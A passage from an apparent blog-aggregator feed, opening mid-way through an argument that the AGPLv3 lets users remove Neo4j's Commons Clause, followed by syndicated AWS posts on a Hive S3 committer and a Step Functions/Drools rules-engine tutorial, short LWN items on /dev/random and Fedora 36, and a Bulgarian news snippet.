Specifically, the AGPLv3 itself has the following provisions (found in AGPLv3§0 and
AGPLv3§7¶4):

  • “This License” refers to version 3 of the GNU Affero
    General Public License.
  • “The Program” refers to any copyrightable work licensed under this
    License. Each licensee is addressed as “you”.
  • If the Program as you received it, or any part of it, contains a notice
    stating that it is governed by this License along with a term that is a
    further restriction, you may remove that term.

That last term was added to address a real-world, known problem with GPLv2.
Frequently throughout the time when GPLv2 was the current version, original copyright holders and/or licensors
would attempt to license work under the GPL with additional restrictions. The problem was rampant and caused much confusion among licensees.
As an attempted solution, the FSF (the publisher of the various
GPL’s) loosened
its restrictions on reuse of the text of the GPL
— in hopes that would provide a route for
reuse of some GPL text, while also avoiding confusion for licensees. Sadly, many licensors
continued to take the confusing route of using the entire text a GPL
license with an additional restriction — attached either before or after, or both. Their goals were obvious and nefarious: they
wanted to confuse the public into “thinking” the software was
under the GPL, but in fact restrict certain other activities (such as
commercial redistribution). They combined this practice with proprietary relicensing (i.e., a sole
licensor selling separate proprietary licenses while releasing a (seemingly FOSS) public version of the code as demoware for marketing).
Their goal is to build on the popularity of the GPL, but in direct opposition to the GPL’s policy goals; they manipulate the GPL to open-wash bad policies rather than give actual rights to users.
This tactic even permitted bad actors to sell “gotcha” proprietary licenses to those who were legitimately confused. For example,
a company would look for users operating commercially with the code in compliance with GPLv2, but hadn’t noticed the company’s code had the statement: “Licensed GPLv2, but not for commercial use”. The user had seen GPLv2, and knew from its brand reputation that it
gave certain rights, but hadn’t realized that the additional restriction outside of the GPLv2’s text might actually be valid. The goal was to catch users
in a sneaky trap.

Neo4j tried to use the AGPLv3 to set one of those traps. Neo4j, despite the permission in the FSF’s GPL FAQ to “use the GPL
terms (possibly modified) in another license provided that you call your
license by another name and do not include the GPL preamble”
,
left
the entire AGPLv3 intact as the license of the software — adding only a note at the front and at the
end
. However, their users can escape the trap, because GPLv3 (and AGPLv3) added
a clause (which doesn’t exist in GPLv2) to defend users from this. Specifically,
AGPLv3§7¶4 includes a key provision to help this situation.

Specifically, the clause was designed to give more rights to downstream recipients when bad
actors attempt this nasty trick. Indeed, I recall from my direct participation in
the A/GPLv3 drafting that this provision was specifically designed for the
situation where the original, sole copyright
holder/licensor0
added additional restrictions. And, I’m not the only one who recalls this.
Richard Fontana (now a lawyer at IBM’s Red Hat,
but previously legal counsel to the FSF during the GPLv3 process), wrote on a mailing list1
in
response to the Neo4j preliminary injunction ruling:

For those who care about anecdotal drafting history … the whole point of the section 7 clause (“If the Program as you received it, or any part of
it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that
term.”) was to address the well known problem of an original GPL
licensor tacking on non-GPL, non-FOSS, GPL-norm-violating
restrictions, precisely like the use of the Commons Clause with the
GPL. Around the time that this clause was added to the GPLv3 draft,
there had been some recent examples of this phenomenon that had been
picked up in the tech press.

Fontana also pointed us to the FSF’s own words on the subject, written during their process of drafting this section of the license (emphasis ours):

Unlike additional permissions, additional requirements that are allowed under subsection 7b may not be
removed. The revised section 7 makes clear that this condition does not
apply to any other additional requirements, however, which are removable

just like additional permissions. Here we are particularly concerned
about the practice of program authors who purport to license their works
under the GPL with an additional requirement that contradicts the terms
of the GPL, such as a prohibition on commercial use
. Such terms can
make the program non-free, and thus contradict the basic purpose of the
GNU GPL; but even when the conditions are not fundamentally unethical,
adding them in this way invariably makes the rights and obligations of
licensees uncertain.

While the intent of the original drafter of a license text is not
dispositive over the text as it actually appears in the license, all this information was available to Neo4j
as they drafted their license. Many voices in the community had told them that provision in AGPLv3§3¶4
was added specifically to prevent what Neo4j was trying to do. The FSF, the copyright holder of the actual text of the AGPLv3, also publicly
gave Neo4j permission to draft a new license, using any provisions they like from AGPLv3
and putting them together in a new way. But Neo4j made a conscious choice to not do that,
but instead constructed their license in the exact manner that allowed Suhy’s removal
of the “Commons Clause”.

In addition, that provision in AGPLv3§3¶4 has little
meaning if it’s not intended to bind the original licensor!
Many other provisions (such as AGPLv3§10¶3) protect the users
against further restrictions imposed later in the distribution chain of
licensees. This clause was targeted from its inception against the
exact, specific bad behavior that Neo4j did here.

We don’t dispute that copyright and contract law give Neo4j authority to
license their work under any terms they wish — including terms that we consider unethical or immoral. In fact, we already pointed out above that
Neo4j had permission to pick and choose only some text from AGPLv3. As long as
they didn’t use the name “Affero”, “GNU” or
“General Public” or include any of the Preamble text in the name/body of
their license — we’d readily agree that Neo4j could have put together a bunch
of provisions from the AGPLv3, and/or the “Commons Clause”, and/or any other license
that suited their fancy. They could have made an entirely new license. Lawyers commonly do share text of
licenses and contracts to jump-start writing new ones. That’s a
practice we generally support (since it’s sharing a true commons of ideas freely — even if the resulting license might not be FOSS).

But Neo4j consciously chose not to do that. Instead, they license their software
“subject to the terms of the GNU AFFERO GENERAL PUBLIC LICENSE Version
3, with the Commons Clause”
. (The name “Neo4j Sweden Software
License” only exists in the later Court papers, BTW, not with “The Program” in question.) Neo4j defines
“This License” to mean “version 3 of the GNU Affero General
Public License.”. Then, Neo4j tells all licensees
that “If the Program as you received it, or any part of it, contains a
notice stating that it is governed by this License along with a term that is
a further restriction, you may remove that term”. Yet, after all that, Neo4j had the audacity
to claim to the Court that they didn’t actually mean that last sentence, and the Court rubber-stamped that view.

Simply put, the Court
erred when
it said
: “Neither of the two provisions in the form AGPLv3 that
Defendants point to give licensees the right to remove the information at
issue.”. The Court then used that error as a basis for its ruling
to temporarily enjoin Suhy from stating that software with
“Commons Clause” removed by downstream is “free and open
source”, or tell others that he disagrees with the Court’s (temporary) conclusion about removing the “Commons Clause” in this situation.

What Next?

The case isn’t over. The lower Court still has various issues to consider — including a DMCA claim regarding
Suhy’s removal of the “Commons Clause”.
We suspect that’s why the Court only made a preliminary injunction against Suhy’s
words, and did not issue an injunction against the actual removal of
the clause
! The issue as to whether the clause can be removed is still pending, and the current summary judgment decision doesn’t address
the DMCA claim from Neo4j’s complaint.

Sadly,
the Court
has temporarily enjoined Suhy
from “representing that Neo4j
Sweden AB’s addition of the Commons Clause to the license governing Neo4j
Enterprise Edition violated the terms of AGPL or that removal of the Commons
Clause is lawful, and similar statements”. But they haven’t enjoined
us, and our view on the matter is as follows:

Clearly, Neo4j gave explicit permission, pursuant to the
AGPLv3, for anyone who would like to to remove the “Commons
Clause” from their LICENSE.txt file in version 3.4 and other versions
of their Enterprise edition where it appears. We believe that you have full
permission, pursuant to AGPLv3, to distribute that software under the terms
of the AGPLv3 as written. In saying that, we also point out that we’re not
a law firm, our lawyers are not your lawyers, and this is not legal advice.
However, after our decades of work in copyleft licensing, we know well the
reason and motivations of this policy in the license (describe above), and given the error by
the Court, it’s our civic duty to inform the public that the
licensing conclusions (upon which they based their temporary injunction) are incorrect.

Meanwhile, despite what you may have read last week, the key software licensing issues in this
case have not been decided — even by the lower Court. For example, the DMCA issue is still before the trial court.
Furthermore, if
you do read the docket of this case, it will be obvious that
neither party is perfect. We have not analyzed every action Suhy took, nor do we have any comment
on any action by Suhy other than this: we believe that Suhy’s
removal of the “Commons Clause” was fully permitted by
the terms of the AGPLv3, and that Neo4j gave him that permission in that license. Suhy also did a great service to the community by taking
action that obviously risked litigation against him.
Misappropriation and manipulation of the strongest and most
freedom-protecting copyleft license ever written to bolster a proprietary
relicensing business model is an affront to FOSS and its advancement. It’s even worse when the Courts are on the side of the bad actor.
Neo4j should not have done this.

Finally, we note that the Court was rather narrow on what it said regarding the question of “What Is Open Source?”. The Court
ruled that one individual and his companies — when presented with ambiguous licensing information
in one part of a document, who then finds another part of the document grants permission
to repair and clarify the licensing information, and does so — is temporarily forbidden
from telling others that the resulting software is, in fact, FOSS, after making such a change.
The ruling does not set precedent, nor does it bind anyone other than the Defendants as to what
they can or cannot say is FOSS, which is why we can say it is FOSS, because the AGPLv3 is an OSI-approved
license and the AGPLv3 permits removal of the toxic “Commons Clause” in this situation.

We will continue to follow this case and write further when new events occur..


0
We were unable to find anywhere in the Court record that shows Neo4j used a Contributor Licensing Agreement (CLA) or Copyright
Assignment Agreement (©AA) that sufficiently gave them exclusive rights as licensor of this software. We did however
find evidence online that Neo4j accepted contributions from others. If Neo4j is, in fact, also a licensor of others’ AGPLv3’d
derivative works that have been incorporated into their upstream versions, then there are many other arguments (in addition to the one
presented herein) that would permit removal of the “Commons Clause”. This issue remains an open question of fact in this case.

1 Fontana made these statements on a mailing list
governed by an odd confidentiality rule called CHR (which was originally designed for in-person meetings with a beginning and an end, not
a mailing list). Nevertheless, Fontana explicitly waived CHR (in writing) to allow me to quote his words publicly.

Up to 15 times improvement in Hive write performance with the Amazon EMR Hive zero-rename feature

Post Syndicated from Suthan Phillips original https://aws.amazon.com/blogs/big-data/up-to-15-times-improvement-in-hive-write-performance-with-the-amazon-emr-hive-zero-rename-feature/

Our customers use Apache Hive on Amazon EMR for large-scale data analytics and extract, transform, and load (ETL) jobs. Amazon EMR Hive uses Apache Tez as the default job execution engine, which creates Directed Acyclic Graphs (DAGs) to process data. Each DAG can contain multiple vertices from which tasks are created to run the application in parallel. Their final output is written to Amazon Simple Storage Service (Amazon S3).

Hive initially writes data to staging directories and then move it to the final location after a series of rename operations. This design of Hive renames supports task failure recovery, such as rescheduling the failed task with another attempt, running speculative execution, and recovering from a failed job attempt. These move and rename operations don’t have a significant performance impact in HDFS because it’s only a metadata operation when compared to Amazon S3 where the performance can degrade significantly based on the number of files written.

This post discusses the new optimized committer for Hive in Amazon EMR and also highlights its impressive performance by running a TPCx-BB performance benchmark and comparing it with the Hive default commit logic.

How Hive commit logic works

By default, Apache Hive manages the task and job commit phase and doesn’t have support for pluggable Hadoop output committers, which you can use to customize Hive’s file commit behavior.

In its current state, the rename operation with Hive-managed and external tables happens in three places:

  • Task commit – The output of task attempts is stored in its own staging directory. In the task commit phase, they’re renamed and moved to a task-specific staging directory.
  • Job commit – In this phase, the final output is generated from the output of all committed tasks of a job attempt. Task-specific staging directories are renamed and moved to the job commit staging directory.
  • Move task – The job commit staging directory is renamed or moved to the final table directory.

The impact of these rename operations is more significant on Hive jobs writing a large number of files.

Hive EMRFS S3-optimized committer

To mitigate the slowdown in write performance due to renames, we added support for output committers in Hive. We developed a new output committer, the Hive EMRFS S3-optimized committer, to avoid Hive rename operations. This committer directly writes the data to the output location, and the file commit happens only at the end of the job to ensure that it is resilient to job failures.

It modifies the default Hive file naming convention from <task_id>_<attempt_id>_<copy_n> to <task_id>_<attempt_id>_<copy_n>-<query_id>. For example, after an insert query in a Hive table, the output file is generated as 000000_0-hadoop_20210714130459_ba7c23ec-5695-4947-9d98-8a40ef759222-1 instead of 000000_0, where the suffix is the combination of user_name, timestamp, and UUID, which forms the query ID.

Performance evaluation

We ran the TPCx-BB Express Benchmark tests with and without the new committer and evaluated the write performance improvement.

The following graph shows performance improvement measured as total runtime of the queries. With the new committer, the runtime is better(lower).

This optimization is for Hive writes and hence the majority of improvement occurred in the load test, which is the writing phase of the benchmark. We observed an approximate 15-times reduction in runtime. However, we didn’t see much improvement in the power test and throughput test because each query is just writing a single file to the final table.

The benchmark used in this post is derived from the industry-standard TPCx-BB benchmark, and has the following characteristics:

  • The schema and data are used unmodified from TPCx-BB.
  • The scale factor used is 1000.
  • The queries are used unmodified from TPCx-BB.
  • The suite has three tests: the load test is the process of building of test database and is write heavy; the power test determines the maximum speed the system takes to run all the queries; and the Throughput test runs the queries in concurrent streams. The run elapsed times are used as the primary metric.
  • The power tests and throughput tests include 25 out of 30 queries. The five queries for machine learning workloads were excluded.

Note that this is derived from the TPCx-BB benchmark, and as such is not comparable to published TPCx-BB results, as the results of our tests do not comply with the specification.

Understanding performance impact with different data sizes and number of files

To benchmark the performance impact with variable data sizes and number of files, we also evaluated the following INSERT OVERWRITE query over the store_sales table from the TPC-DS dataset with additional variations, such as size of data (1 GB, 5 GB, 10 GB, 25 GB, 50 GB, 100 GB), number of files, and number of partitions:

SET partitions=100.0
SET files_per_partition=10;

CREATE TABLE store_sales_simple_test
(ss_sold_time_sk int, ss_item_sk int, ss_customer_sk int,
ss_cdemo_sk int, ss_hdemo_sk int, ss_addr_sk int,
ss_store_sk int, ss_promo_sk int, ss_ticket_number bigint,
ss_quantity int, ss_wholesale_cost decimal(7,2),
ss_list_price decimal(7,2), ss_sales_price decimal(7,2),
ss_ext_discount_amt decimal(7,2),
ss_ext_sales_price decimal(7,2),
ss_ext_wholesale_cost decimal(7,2),
ss_ext_list_price decimal(7,2), ss_ext_tax decimal(7,2),
ss_coupon_amt decimal(7,2), ss_net_paid decimal(7,2),
ss_net_paid_inc_tax decimal(7,2),
ss_net_profit decimal(7,2), ss_sold_date_sk int)
PARTITIONED BY (part_key int)
STORED AS ORC
LOCATION 's3://<bucket>/<table_location>';

Insert overwrite table store_sales_simple_test
select * , FLOOR(RAND()*${partitions}) as part_key
from store_sales distribute by part_key, FLOOR(RAND()*${files_per_partition});

The results show that the number of files written is the critical factor for performance improvement when using this new committer in comparison to the default Hive commit logic.

In the following graph, the y-axis denotes the speedup (total time taken with rename / total time taken by query with committer), and the x-axis denotes the data size.

Enabling the feature

To enable Amazon EMR Hive to use HiveEMRFSOptimizedCommitter to commit data as the default for all Hive-managed and external tables, use the following hive-site configuration starting with EMR 6.5.0 or EMR 5.34.0 clusters:

[
  {
    "classification": "hive-site",
    "properties": {
      "hive.blobstore.use.output-committer": "true"
    }
  }
]

The new committer is not compatible with the hive.exec.parallel=true setting. Be sure to not enable both settings at the same time in Amazon EMR 6.5.0. In future EMR releases, parallel execution will automatically be disabled when the new Hive committer is used.

Limitations

This committer will not be used and default Hive commit logic will be applied in the following scenarios:

  • When merge small files (hive.merge.tezfiles) is enabled
  • When using Hive ACID tables
  • When partitions are distributed across file systems such as HDFS and Amazon S3

Summary

The Hive EMRFS S3-optimized committer improves write performance compared to the default Hive commit logic, eliminating Amazon S3 renames. You can use this feature starting with Amazon EMR 6.5.0 and Amazon EMR 5.34.0.

Stay tuned for additional updates on new features and further improvements in Apache Hive on Amazon EMR.


About the Authors

Suthan Phillips works with customers to provide them architectural guidance and helps them achieve performance enhancements for complex applications on Amazon EMR. In his spare time, he enjoys hiking and exploring the Pacific Northwest.

Aditya Shah is a Software Development Engineer at AWS. He is interested in Databases and Data warehouse engines and has worked on distributed filesystem, ACID compliance and metadata management of Apache Hive. When not thinking about data, he is browsing pages of internet to sate his appetite for random trivia and is a movie geek at heart.

Syed Shameerur Rahman is a software development engineer at Amazon EMR. He is interested in highly scalable, distributed computing. He is an active contributor of open source projects like Apache Hive, Apache Tez, Apache ORC and has contributed important features and optimizations. During his free time, he enjoys exploring new places and food.

[$] Problems emerge for a unified /dev/*random

Post Syndicated from original https://lwn.net/Articles/889452/

In mid-February, we reported on the plan to
unite the two kernel devices that provide random numbers;
/dev/urandom was to effectively just be another way to access the
random numbers provided by /dev/random. That change made it as
far as the mainline during the Linux 5.18 merge window, but it was
quickly reverted when problems were found. It may be possible to
do that unification someday, but, for now, there are environments that need
their random numbers early on—without entropy or the “Linus jitter dance”
being available on the platform.

Fedora 36 beta released

Post Syndicated from original https://lwn.net/Articles/889602/

The Fedora
36 beta release
has been announced.

Fedora 36 Workstation Beta includes GNOME 42, the newest release of
the GNOME desktop environment. GNOME 42 includes a global dark
style UI setting. It also has a redesigned screenshot tool. And
many core GNOME apps have been ported to the latest version of the
GTK toolkit, providing improved performance and a modern look.

If all goes well, the final Fedora 36 release will happen at the end of April.

Using AWS Step Functions and Amazon DynamoDB for business rules orchestration

Post Syndicated from James Beswick original https://aws.amazon.com/blogs/compute/using-aws-step-functions-and-amazon-dynamodb-for-business-rules-orchestration/

This post is written by Vijaykumar Pannirselvam, Cloud Consultant, Sushant Patil, Cloud Consultant, and Kishore Dhamodaran, Senior Solution Architect.

A Business Rules Engine (BRE) is used in enterprises to manage business-critical decisions. The logic or rules used to make such decisions can vary in complexity. A finance department may have a basic rule to get any purchase over a certain dollar amount to get director approval. A mortgage company may need to run complex rules based on inputs (for example, credit score, debt-to-income ratio, down payment) to make an approval decision for a loan.

Decoupling these rules from application logic provides agility to your rules management, since business rules may often change while your application may not. It can also provide standardization across your enterprise, so every department can communicate with the same taxonomy.

As part of migrating their workloads, some enterprises consider replacing their commercial rules engine with cloud native and open-source alternatives. The motivation for such a move stem from several factors, such as simplifying the architecture, cost, security considerations, or vendor support.

Many of these commercial rules engines come as part of a BPMS offering that provides orchestration capabilities for rules execution. For a successful migration to cloud using an open-source rules engine management system, you need an orchestration capability to manage incoming rule requests, auditing the rules, and tracking exceptions.

This post showcases an orchestration framework that allows you to use an open-source rules engine. It uses Drools rules engine to build a set of rules for calculating insurance premiums based on the properties of Car and Person objects. This uses AWS Step Functions, AWS Lambda, Amazon API Gateway, Amazon DynamoDB, and open-source Drools rules engine to show this. You can swap the rules engine provided you can manage it in the AWS Cloud environment and expose it as an API.

Solution overview

The following diagram shows the solution architecture.

Solution architecture

The solution comprises:

  1. API Gateway – a fully managed service that makes it easier to create, publish, maintain, monitor, and secure APIs at any scale for API consumers. API Gateway helps you manage traffic to backend systems, in this case Step Functions, which orchestrates the execution of tasks. For the REST API use-case, you can also set up a cache with customizable keys and time-to-live in seconds for your API data to avoid hitting your backend services for each request.
  2. Step Functions – a low code service to orchestrate multiple steps involved to accomplish tasks. Step Functions uses the finite-state machine (FSM) model, which uses given states and transitions to complete the tasks. The diagram depicts three states: Audit Request, Execute Ruleset and Audit Response. We execute them sequentially. You can add additional states and transitions, such as validating incoming payloads, and branching out parallel execution of the states.
  3. Drools rules engine Spring Boot application – runtime component of the rule execution. You set the Drools rule engine Spring Boot application as an Apache Maven Docker project with Drools Maven dependencies. You then deploy the Drools rule engine Docker image to an Amazon Elastic Container Registry (Amazon ECR), create an AWS Fargate cluster, and an Amazon Elastic Container Service (Amazon ECS) service. The service launches Amazon ECS tasks and maintains the desired count. An Application Load Balancer distributes the traffic evenly to all running containers.
  4. Lambda – a serverless execution environment giving you an ability to interact with the Drools Engine and a persistence layer for rule execution audit functions. The Lambda component provides the audit function required to persist the incoming requests and outgoing responses in DynamoDB. Apart from the audit function, Lambda is also used to invoke the service exposed by the Drools Spring Boot application.
  5. DynamoDB – a fully managed and highly scalable key/value store, to persist the rule execution information, such as request and response payload information. DynamoDB provides the persistence layer for the incoming request JSON payload and for the outgoing response JSON payload. The audit Lambda function invokes the DynamoDB put_item() method when it receives the request or response event from Step Functions. The DynamoDB table rule_execution_audit has an entry for every request and response associated with the incoming request-id originated by the application (upstream).

Drools rules engine implementation

The Drools rules engine separates the business rules from the business processes. You use DRL (Drools Rule Language) by defining business rules as .drl text files. You define model objects to build the rules.

The model objects are POJO (Plain Old Java Objects) defined using Eclipse, with the Drools plugin installed. You should have some level of knowledge about building rules and executing them using the Drools rules engine. The below diagram describes the functions of this component.

Drools process

You define the following rules in the .drl file as part of the GitHub repo. The purpose of these rules is to evaluate the driver premium based on the input model objects provided as input. The inputs are Car and Driver objects and output is the Policy object, which has the premium calculated based on the certain criteria defined in the rule:

rule "High Risk"
     when     
         $car : Car(style == "SPORTS", color == "RED") 
         $policy : Policy() 
         and $driver : Driver ( age < 21 )                             
     then
         System.out.println(drools.getRule().getName() +": rule fired");          
         modify ($policy) { setPremium(increasePremiumRate($policy, 20)) };
 end
 
 rule "Med Risk"
     when     
         $car : Car(style == "SPORTS", color == "RED") 
         $policy : Policy() 
         and $driver : Driver ( age > 21 )                             
     then
         System.out.println(drools.getRule().getName() +": rule fired");          
         modify ($policy) { setPremium(increasePremiumRate($policy, 10)) };
 end
 
 
 function double increasePremiumRate(Policy pol, double percentage) {
     return (pol.getPremium() + pol.getPremium() * percentage / 100);
 }
 

Once the rules are defined, you define a RestController that takes input parameters and evaluates the above rules. The below code snippet is a POST method defined in the controller, which handles the requests and sends the response to the caller.

@PostMapping(value ="/policy/premium", consumes = {MediaType.APPLICATION_JSON_VALUE, MediaType.APPLICATION_XML_VALUE }, produces = {MediaType.APPLICATION_JSON_VALUE, MediaType.APPLICATION_XML_VALUE})
    public ResponseEntity<Policy> getPremium(@RequestBody InsuranceRequest requestObj) {
        
        System.out.println("handling request...");
        
        Car carObj = requestObj.getCar();        
        Car carObj1 = new Car(carObj.getMake(),carObj.getModel(),carObj.getYear(), carObj.getStyle(), carObj.getColor());
        System.out.println("###########CAR##########");
        System.out.println(carObj1.toString());
        
        System.out.println("###########POLICY##########");        
        Policy policyObj = requestObj.getPolicy();
        Policy policyObj1 = new Policy(policyObj.getId(), policyObj.getPremium());
        System.out.println(policyObj1.toString());
            
        System.out.println("###########DRIVER##########");    
        Driver driverObj = requestObj.getDriver();
        Driver driverObj1 = new Driver( driverObj.getAge(), driverObj.getName());
        System.out.println(driverObj1.toString());
        
        KieSession kieSession = kieContainer.newKieSession();
        kieSession.insert(carObj1);      
        kieSession.insert(policyObj1); 
        kieSession.insert(driverObj1);         
        kieSession.fireAllRules(); 
        printFactsMessage(kieSession);
        kieSession.dispose();
    
        
        return ResponseEntity.ok(policyObj1);
    }    

Prerequisites

Solution walkthrough

  1. Clone the project GitHub repository to your local machine, do a Maven build, and create a Docker image. The project contains Drools related folders needed to build the Java application.
    git clone https://github.com/aws-samples/aws-step-functions-business-rules-orchestration
    cd drools-spring-boot
    mvn clean install
    mvn docker:build
    
  2. Create an Amazon ECR private repository to host your Docker image.
    aws ecr create-repository —repository-name drools_private_repo —image-tag-mutability MUTABLE —image-scanning-configuration scanOnPush=false
  3. Tag the Docker image and push it to the Amazon ECR repository.
    aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin <<INSERT ACCOUNT NUMBER>>.dkr.ecr.us-east-1.amazonaws.com
    docker tag drools-rule-app:latest <<INSERT ACCOUNT NUMBER>>.dkr.ecr.us-east-1.amazonaws.com/drools_private_repo:latest
    docker push <<INSERT ACCOUNT NUMBER>>.dkr.ecr.us-east-1.amazonaws.com/drools_private_repo:latest
    
  4. Deploy resources using AWS SAM:
    cd ..
    sam build
    sam deploy --guided

    SAM deployment output

Verifying the deployment

Verify the business rules execution and the orchestration components:

  1. Navigate to the API Gateway console, and choose the rules-stack API.
    API Gateway console
  2. Under Resources, choose POST, followed by TEST.
    Resource configuration
  3. Enter the following JSON under the Request Body section, and choose Test.

    {
      "context": {
        "request_id": "REQ-99999",
        "timestamp": "2021-03-17 03:31:51:40"
      },
      "request": {
        "driver": {
          "age": "18",
          "name": "Brian"
        },
        "car": {
          "make": "honda",
          "model": "civic",
          "year": "2015",
          "style": "SPORTS",
          "color": "RED"
        },
        "policy": {
          "id": "1231231",
          "premium": "300"
        }
      }
    }
    
  4. The response received shows results from the evaluation of the business rule “High Risk“, with the premium representing the percentage calculation in the rule definition. Try changing the request input to evaluate a “Medium Risk” rule by modifying the age of the driver to 22 or higher:
    Sample response
  5. Optionally, you can verify the API using Postman. Get the endpoint information by navigating to the rule-stack API, followed by Stages in the navigation pane, then choosing either Dev or Stage.
  6. Enter the payload in the request body and choose Send:
    Postman UI
  7. The response received is results from the evaluation of business rule “High Risk“, with the premium representing the percentage calculation in the rule definition. Try changing the request input to evaluate a “Medium Risk” rule by modifying the age of the driver to 22 or higher.
    Body JSON
  8. Observe the request and response audit logs. Navigate to the DynamoDB console. Under the navigation pane, choose Tables, then choose rule_execution_audit.
    DynamoDB console
  9. Under the Tables section in the navigation pane, choose Explore Items. Observe the individual audit logs by choosing the audit_id.
    Table audit item

Cleaning up

To avoid incurring ongoing charges, clean up the infrastructure by deleting the stack using the following command:

sam delete SAM confirmations

Delete the Amazon ECR repository, and any other resources you created as a prerequisite for this exercise.

Conclusion

In this post, you learned how to leverage an orchestration framework using Step Functions, Lambda, DynamoDB, and API Gateway to build an API backed by an open-source Drools rules engine, running on a container. Try this solution for your cloud native business rules orchestration use-case.

For more serverless learning resources, visit Serverless Land.

“Човекът” на дървената мафия – аут? Премиерът уволни зам.-министър след разкритията на Биволъ за дървената мафия

Post Syndicated from Николай Марченко original https://bivol.bg/%D0%BF%D1%80%D0%B5%D0%BC%D0%B8%D0%B5%D1%80%D1%8A%D1%82-%D1%83%D0%B2%D0%BE%D0%BB%D0%BD%D0%B8-%D0%B7%D0%B0%D0%BC-%D0%BC%D0%B8%D0%BD%D0%B8%D1%81%D1%82%D1%8A%D1%80-%D1%81%D0%BB%D0%B5%D0%B4-%D1%80%D0%B0.html

вторник 29 март 2022


Министър-председателят Кирил Петков е издал заповед за освобождаване на зам-министъра на земеделието, храните и горите от квотата на БСП Атанас Добрев. Това потвърдиха за „Биволъ“ шефката на пресцентъра на правителството…

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close